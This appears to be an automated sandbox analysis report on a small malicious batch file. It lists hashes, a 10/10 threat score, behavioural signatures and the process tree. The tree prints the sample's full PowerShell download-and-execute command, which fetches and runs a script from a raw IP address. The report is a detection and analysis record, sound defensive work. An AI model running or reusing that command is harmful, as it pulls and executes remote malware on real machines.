Analysis
-
max time kernel
63s -
max time network
63s -
platform
windows7_x64 -
resource
win7 -
submitted
12-07-2020 22:10
Static task
static1
Behavioral task
behavioral1
Sample
f012b64a4c409c683d9fb217954bb81e.bat
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
f012b64a4c409c683d9fb217954bb81e.bat
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
f012b64a4c409c683d9fb217954bb81e.bat
-
Size
220B
-
MD5
3630e6bfeceaf5ae9f0fe776b8146e0b
-
SHA1
233dfd6ce74130dd5c4fea4cfde910b51544c5fd
-
SHA256
4af01116ea53d684aab434e8d65d4fd28822df7f13ada9a7a0a80c8f188fdf9e
-
SHA512
677811903d0bb197ccd3a66b02c1b5c14cd9956cc7668fa8ead565b25941ba3531bc00b6aebbdfc8a3a600bd318f0c1e5fe80c7f421243c6f3c068f81b7ef62a
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/f012b64a4c409c683d9fb217954bb81e
Signatures
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1400 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1400 powershell.exe 1400 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 1400 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.exedescription pid process target process PID 1108 wrote to memory of 1400 1108 cmd.exe powershell.exe PID 1108 wrote to memory of 1400 1108 cmd.exe powershell.exe PID 1108 wrote to memory of 1400 1108 cmd.exe powershell.exe PID 1108 wrote to memory of 1400 1108 cmd.exe powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1400 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\f012b64a4c409c683d9fb217954bb81e.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/f012b64a4c409c683d9fb217954bb81e');Invoke-CSLQTFNOIPZFU;Start-Sleep -s 10000"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Suspicious behavior: CmdExeWriteProcessMemorySpam
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1400-0-0x0000000000000000-mapping.dmp